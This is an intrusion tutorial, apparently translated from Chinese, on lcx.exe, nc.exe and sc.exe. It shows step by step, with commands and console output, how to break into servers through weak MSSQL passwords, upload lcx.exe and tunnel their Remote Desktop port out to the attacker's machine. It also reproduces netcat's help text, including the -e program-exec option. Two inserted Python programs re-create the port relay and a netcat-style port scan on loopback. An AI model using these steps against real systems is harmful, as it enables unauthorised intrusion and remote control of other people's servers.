Three essential little tools for intrusion: lcx.exe, nc.exe, sc.exe

How to use lcx.exe

Earlier, compromised hosts (肉鸡, "chickens") were collected through weak passwords on port 1433, and then... But many servers turned out to have both 1433 and 3389 open while the terminal (Remote Desktop) could not be connected to, because the server itself sits on an internal network and only port 1433 is published to the outside. Fortunately there is lcx.exe, which can be uploaded to the server with sqltools.exe. lcx.exe is a port-forwarding tool: in effect it forwards port 3389 of host A onto host B (B must of course have a public IP), so that connecting to B's 3389 is the same as connecting to A's 3389.

Usage: on your own machine B, listen with

    lcx.exe -listen 51 3389

and on host A run

    lcx.exe -slave <your IP> 51 <host A IP> 3389

After that, connecting to 127.0.0.1 locally reaches host A's 3389. (Since host A makes both connections itself, the second pair can just as well be 127.0.0.1 3389; that avoids depending on the NAT device looping a connection to its own public address back inside.) The second mode is local redirection.

Example. There is a host at 201.1.1.1 with a weak 1433 password; a port scan finds only 1433 open. Connect with sqltools and dir C: to have a look:

    C:\>dir C:\
    2004/09/17  10:32  ...
    2005/02/21  17:08  ...  avgun.log

The server is set to Japanese, so the listing does not display properly. netstat -an shows the open ports:

    C:\>netstat -an
    TCP    0.0.0.0:3376    0.0.0.0:0    LISTENING
    TCP    0.0.0.0:3389    0.0.0.0:0    LISTENING
    TCP    0.0.0.0:3791    0.0.0.0:0    LISTENING
    TCP    0.0.0.0:3877    0.0.0.0:0    LISTENING

Terminal Services is running. Now check the IP with ipconfig:

    C:\>ipconfig
    Windows 2000 IP Configuration
    Ethernet adapter ...:
            Connection-specific DNS Suffix  . :
            IP Address. . . . . . . . . . . . : 192.168.1.24
            Subnet Mask . . . . . . . . . . . : 255.255.255.0
            Default Gateway . . . . . . . . . : 192.168.1.1

An address like that is an internal one, so lcx.exe is the way to handle it. Upload lcx.exe to the host:

    C:\>dir lcx.exe
     Directory of C:\WINNT\system32
    2006/04/02  13:40          32,768 lcx.exe

First, in a cmd window on your own machine, run

    lcx.exe -listen 51 3389

meaning: listen on port 51 and forward it to port 3389. It prints:

    + Listening port 51
    + Listen OK!
    + Listening port 3389
    + Listen OK!
    + Waiting for Client on port:51

Then on the host run

    lcx.exe -slave <your IP> 51 201.1.1.1 3389

(201.1.1.1 is the host IP used in this example; substitute yours.) As soon as it runs, the listener on your own machine receives the connection:

    + Listening port 51
    + Listen OK!
    + Listening port 3389
    + Listen OK!
    + Waiting for Client on port:51
    + Accept a Client on port 51 from 201.1.1.1
    + Waiting another Client on port:3389

Done. Now connect with the terminal client to 127.0.0.1 (or to your own IP) and you will find that what you land in is not your own machine (or that your own machine cannot be connected to at all) but host A.

Advantage: it handles hosts on internal networks. Disadvantage: it is a bit cumbersome, and every time you have to set up the port forward through sqltools first. A reverse-connecting trojan can of course be used to control the host instead.

How to use nc.exe

1. Netcat 1.10 for NT nc11nt.zip, original English information
2. Netcat 1.10 for NT help information
3. Netcat 1.10 common command formats
4. Managing hosts, changing host settings
5. Download link
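The lcx.exe forwarding described in the section above, as an added example that is not part of the original article and does not use lcx's own code: a small Python re-implementation of its two roles, "-listen <p1> <p2>" on the outside machine B and "-slave <B ip> <p1> <target ip> <target port>" on the internal host A, so the data path can be followed end to end. Everything runs on 127.0.0.1 with ports chosen by the OS, and the internal "terminal service" is a constructed echo server; the 51/3389 numbers in the comments only map the roles back to the text.

```python
import socket
import threading


def _listener(host, port):
    """Bind a TCP listening socket; port 0 lets the OS pick a free port."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(1)
    return s


def _pump(src, dst):
    """Copy bytes src -> dst until EOF, then half-close dst so the far end sees EOF too."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _splice(a, b):
    """Relay traffic both ways between two connected sockets (one thread per direction)."""
    for src, dst in ((a, b), (b, a)):
        threading.Thread(target=_pump, args=(src, dst), daemon=True).start()


def start_listen_relay(slave_port, client_port, host="127.0.0.1"):
    """Role of `lcx -listen <slave_port> <client_port>` on machine B, for one session.
    Both ports are bound at once; a background thread waits for host A on slave_port,
    then for one client on client_port, and splices the two. Returns the bound ports."""
    ls = _listener(host, slave_port)
    lc = _listener(host, client_port)
    bound = (ls.getsockname()[1], lc.getsockname()[1])

    def accept_and_splice():
        slave, _ = ls.accept()   # "Accept a Client on port:<slave_port>"
        client, _ = lc.accept()  # "Waiting another Client on port:<client_port>"
        ls.close()
        lc.close()
        _splice(slave, client)

    threading.Thread(target=accept_and_splice, daemon=True).start()
    return bound


def run_slave(relay_host, relay_port, target_host, target_port):
    """Role of `lcx -slave <B ip> <slave_port> <target ip> <target port>` on host A.
    A makes both connections itself: outbound to B (which the NAT allows) and to the
    service being exposed (so 127.0.0.1 works as the target), then relays between them."""
    up = socket.create_connection((relay_host, relay_port))
    down = socket.create_connection((target_host, target_port))
    _splice(up, down)


def start_target_service(host="127.0.0.1"):
    """Constructed stand-in for A's internal service (3389 in the article): takes one
    connection and echoes input upper-cased, so the round trip through both hops is checkable."""
    srv = _listener(host, 0)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data.upper())

    threading.Thread(target=serve, daemon=True).start()
    return port


def demo(message=b"hello from outside\n"):
    """Wire target (A) -> slave (A) -> listener (B), connect as the outside client to B's
    client port, and return what comes back through the tunnel."""
    target_port = start_target_service()                          # service on A
    slave_port, client_port = start_listen_relay(0, 0)            # `lcx -listen 51 3389` on B
    run_slave("127.0.0.1", slave_port, "127.0.0.1", target_port)  # `lcx -slave B 51 127.0.0.1 3389` on A
    with socket.create_connection(("127.0.0.1", client_port), timeout=5) as client:
        client.sendall(message)
        buf = b""
        while not buf.endswith(b"\n"):
            chunk = client.recv(4096)
            if not chunk:
                break
            buf += chunk
    return buf.decode()


if __name__ == "__main__":
    print(demo(), end="")
```

Run it directly and the line HELLO FROM OUTSIDE comes back through both hops. The ordering is exactly the one the article's transcript shows: the listener is up before the slave connects, and the slave is accepted before the outside client is, which is why accept_and_splice takes the slave connection first and only then waits on the client port.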
#1. Netcat 1.10 for NT nc11nt.zip#

Basic Features
* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomizer
* Can read command line arguments from standard input
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Ability to let another program service established connections
* Telnet-options responder

New for NT
* Ability to run in the background without a console window
* Ability to restart as a single-threaded server to handle a new connection

Some of the features of netcat are:
  Outbound or inbound connections, TCP or UDP, to or from any ports
  Full DNS forward/reverse checking, with appropriate warnings
  Ability to use any local source port
  Ability to use any locally-configured network source address
  Built-in port-scanning capabilities, with randomizer
  Built-in loose source-routing capability
  Can read command line arguments from standard input
  Slow-send mode, one line every N seconds
  Optional ability to let another program service inbound connections

Some of the potential uses of netcat:
  Script backends
  Scanning ports and inventorying services
  Backup handlers
  File transfers
  Server testing and simulation
  Firewall testing
  Proxy gatewaying
  Network performance testing
  Address spoofing tests
  Protecting X servers
  1001 other uses you'll likely come up with

Netcat + Encryption = Cryptcat

Compare this with Windows 2000's Microsoft telnet.exe and the Microsoft tlntsvr.exe service: the difference is visible as soon as you connect.
1.1 NC.EXE is a non-standard telnet client program.
1.2 There is also the putty.exe client, which offers four connection modes: -raw, -telnet, -rlogin, -ssh.

#2. Netcat 1.10 for NT help information#

    C:\WINDOWS\Desktop>nc -h
    [v1.10 NT]
    connect to somewhere:   nc [-options] hostname port[s] [ports] ...
    listen for inbound:     nc -l -p port [options] [hostname] [port]
    options:
            -d              detach from console, background mode  (run in the background)
            -e prog         inbound program to exec [dangerous!!]
            -g gateway      source-routing hop point[s], up to 8
            -G num          source-routing pointer: 4, 8, 12, ...
            -h              this cruft  (this help text)
            -i secs         delay interval for lines sent, ports scanned  (delay)
            -l              listen mode, for inbound connects  (listen and wait for a connection)
            -L              listen harder, re-listen on socket close  (keep listening after the connection closes)
            -n              numeric-only IP addresses, no DNS  (numeric IPs, no DNS resolution)
            -o file         hex dump of traffic  (three-column hex dump written to file)
            -p port         local port number  (local port)
            -r              randomize local and remote ports  (random local and remote ports)
            -s addr         local source address  (local source address)
            -t              answer TELNET negotiation
            -u              UDP mode
            -v              verbose [use twice to be more verbose]  (-vv for more detail)
            -w secs         timeout for connects and final net reads
            -z              zero-I/O mode [used for scanning]  (scan mode, use with -vv)
    port numbers can be individual or ranges: m-n [inclusive]

A note on -e: it hands the accepted connection to the named program as that program's standard input and output, so whoever can reach the port is talking to that program directly; that is why the help text itself marks it dangerous.
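The -z, -w and -r options from the help text above, as an added example that is neither from the article nor from netcat's own source: a small Python equivalent of `nc -v -z -w <secs> [-r] host m-n`. Like nc -z it only completes the TCP connect, sends nothing and closes; the timeout stands in for -w and the shuffle for -r. The report lines follow the "host [ip] port open" shape of nc's verbose output. The two target ports in the demo are constructed on loopback so it runs offline.

```python
import random
import socket


def parse_ports(spec):
    """nc-style port spec(s): '80', '20-25' (inclusive), an int, or a list of those."""
    items = [spec] if isinstance(spec, (int, str)) else list(spec)
    ports = []
    for item in items:
        item = str(item)
        if "-" in item:
            lo, hi = item.split("-", 1)
            ports.extend(range(int(lo), int(hi) + 1))
        else:
            ports.append(int(item))
    return ports


def zero_io_scan(host, spec, timeout=1.0, randomize=False):
    """`nc -z [-w timeout] [-r] host ports`: complete the TCP connect, send nothing, close.
    Returns {port: 'open' | 'closed' | 'timeout'}; 'timeout' is what a filtered port
    looks like (no SYN-ACK and no RST within -w seconds)."""
    order = parse_ports(spec)
    if randomize:                   # -r: probe in random order
        random.shuffle(order)
    results = {}
    for port in order:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)       # -w secs
        try:
            s.connect((host, port))
            results[port] = "open"
        except socket.timeout:
            results[port] = "timeout"
        except OSError:             # ECONNREFUSED (RST) or unreachable
            results[port] = "closed"
        finally:
            s.close()
    return results


def verbose_report(host, results, ip=None):
    """One 'host [ip] port state' line per probed port, sorted by port, in the spirit of
    `nc -v -z` output; ip may be supplied to avoid any lookup."""
    ip = ip or socket.gethostbyname(host)
    return [f"{host} [{ip}] {port} {state}" for port, state in sorted(results.items())]


def demo():
    """Constructed targets: one listening port and one just-freed port on loopback."""
    open_srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    open_srv.bind(("127.0.0.1", 0))
    open_srv.listen(1)
    open_port = open_srv.getsockname()[1]
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()                     # nothing listens here now: connect gets a RST
    try:
        results = zero_io_scan("127.0.0.1", [open_port, closed_port],
                               timeout=1.0, randomize=True)
    finally:
        open_srv.close()
    return open_port, closed_port, results


if __name__ == "__main__":
    op, cp, res = demo()
    for line in verbose_report("127.0.0.1", res, ip="127.0.0.1"):
        print(line)
```

The three-way result distinguishes what a single "closed" would hide: a refused port answered with a RST, while a timed-out one is most likely being filtered, which is the same distinction you read off nc by watching whether a port fails instantly or only after the -w interval.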